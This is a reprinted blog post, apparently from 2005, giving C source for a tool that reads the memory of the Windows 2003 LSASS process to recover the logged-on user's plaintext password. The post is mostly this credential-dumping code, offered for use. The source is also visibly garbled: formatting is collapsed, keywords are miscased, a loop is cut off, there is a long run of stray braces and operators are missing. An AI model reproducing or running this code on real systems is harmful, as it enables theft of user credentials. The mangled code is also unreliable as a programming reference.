Reprinted from Kernet Eternal Kingdom — plaintext passwords in the LSASS process on XP and 2003


By reading the memory of the LSASS process on XP and 2003 with WinHEX, the plaintext password of the currently logged-on user can be found.

Source Code:

// ******************************************************** ***************************************** // Version: v1.0 // CODER: Wineggdrop // Date Release: 12 / 15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box, The Method // Used Is Pretty unwise, But This May Be The Only Way To Review The // Logon User's Password On Windows 2003.// Test PlatForm : Windows 2003 // Compiled ON: VC 6.0 // ********************************************** ******************************************* # include # include #include #define BaseAddress 0x002b5000 // The Base Memory Address To Search; The Password May Be Located Before The Address Or Far More From This Address, Which Causes The Result Unreliablechar Password [MAX_PATH] = {0}; // store the found password // function prototype declaration // -------------------------------- -------------------------------------------------- -------------------- Bool Findpassword (DWORD PID); int search (char * buffer, const uint Nsize); DWORD getlssspid (); BOOL IS2003 (); // ----------------------------------- -------------------------------------------------- ----------------- // end of fucntion prototype declarationint main () {dWord PID = 0; Printf ("Windows 2003 Password Viewer v1.0 by Wineggdrop / N / N" ); If (! IS2003 ()) // Check Out if the Box is 2003 {printf ("The Program CAN't Only Run On Windows 2003 Platform / N"); Return -1;} PID = getlsasSPID (); / / Get the lsass.exe pid if (pid == 0) // Fail to get pid if returning zerom {return -1;} Findpassword (PID); // Find the password from lsass.exe memory returnograph;

} // end main () // ----------------------------------------- ------------------------------------------ // Purpose: Search The Memory & Try to get the password // Return Type: int // parameters: // in: char * buffer -> the memory buffer to search // out: const uint nsize -> The size of the memory buffer // Note : The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location, But It's Not Always True That // We Will Find The Magic String, Or Even We Find It, The Password May Be located // at some Other place.we Only Look for luck // ---------------------------------- -------------------------------------------------- INT Search (Char * Buffer, const uint nsize) {uint offset = 0; uint i = 0; uint j = 0; uint count = 0; if (buffer == null) {RETURN-1;} for (i = 0 ; i

Strlen ("Remote") 1; IF (& Buffer [I Offset], "Procedure", Strlen ("Procedure") == 0) {OFFSET = Strlen ("Procedure") 1; IF StrnicMP (& Buffer [i offset], "call", strlen ("call")) == 0) {i = offset; break;}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} {zeromeMory (Password, Sizeof (Password); for (; i 0) {Password [count ] = buffer [j];} else {breaf;}} Return i 7; // one flag to indeicate we find the password}} Return -1;

// Well, We Fail to Find the password, and this always happens}} // end search // ---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- ------ // purpose: to get the lsass.exe pid // return type: dword // parameters: none // -------------------- -------------------------------------------------- -------------- DWORD GetLsassPID () {HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE ) {printf ( "Fail To Create Snap Shot / n"); return 0;} pe32.dwSize = sizeof (PROCESSENTRY32); if (Process32First (hProcessSnap, & pe32!)) {CloseHandle (hProcessSnap); // Must clean up the Snapshot Object! Return 0; DO {IF (strcmpi (pe32.szexefile, "lsass.exe") == 0) {PID = pe32.th32processid; break;}} while (Process32Next (HProcessSnap, & PE32); c LoseHandle (HProcessSnap); Return PID;} // ---------------------------------- -------------------------------------------------- - // Purpose: to find the password // Return Type: Boolean // Parameters: // in: DWORD PID -> The lsass.exe's pid // ---------------- -------------------------------------------------- ------------------ Bool Findpassword (DWORD PID) {Handle HPROCESS = NULL; Char Buffer [5 * 1024] = {0}; DWORD BYTEGET = 0; int found = -1; HProcess = OpenProcess (Process_vm_read, false, pid); // open process if (hprocess == null) {printf ("

Fail to open process / n "); Return False;} f (! ReadprocessMemory (HProcess, (Pvoid) BaseEaddress, Buffer, 5 * 1024, & Byteget) // read the memory from lsass.exe {printf (" Fail to Readf) Memory / N "); CloseHandle (HProcess); Return False;} CloseHandle (HProcess); Found = Search (Buffer, Byteget); // Search the password if (Found> = 0) // We May Find the password {IF (strlen (password> 0) // Yes, We Find the password even we don't know ife {printf ("Found Password AT # 0x% x -> /"% s / "/ n ", Found Baseaddress, Password);}}} else {printf (" Fail to Find the Password / N ");} Return True;} // end Findpassword // ------------- -------------------------------------------------- --------------------- // Purpose: Check if The Box is Windows 2003 // Return Type: Boolean // Parameters: None // ----- -------------------------------------------------- --------------- -------------- BOOL Is2003 () {OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory (& osvi, sizeof (OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFOEX); if ((b0sVersionInfoEx =! GetversionEx (OsversionInfo *) & OSVI))) {osvi.dwosversioninfosize = sizeof (OsversionInfo);} return (Osvi.dwmajorversion == 5 && Osvi.dwminorversion == 2);} // end is2003 () // end of file Original source http://blog.9cbs.net/kernet/archive/2005/03/06/312715.aspx

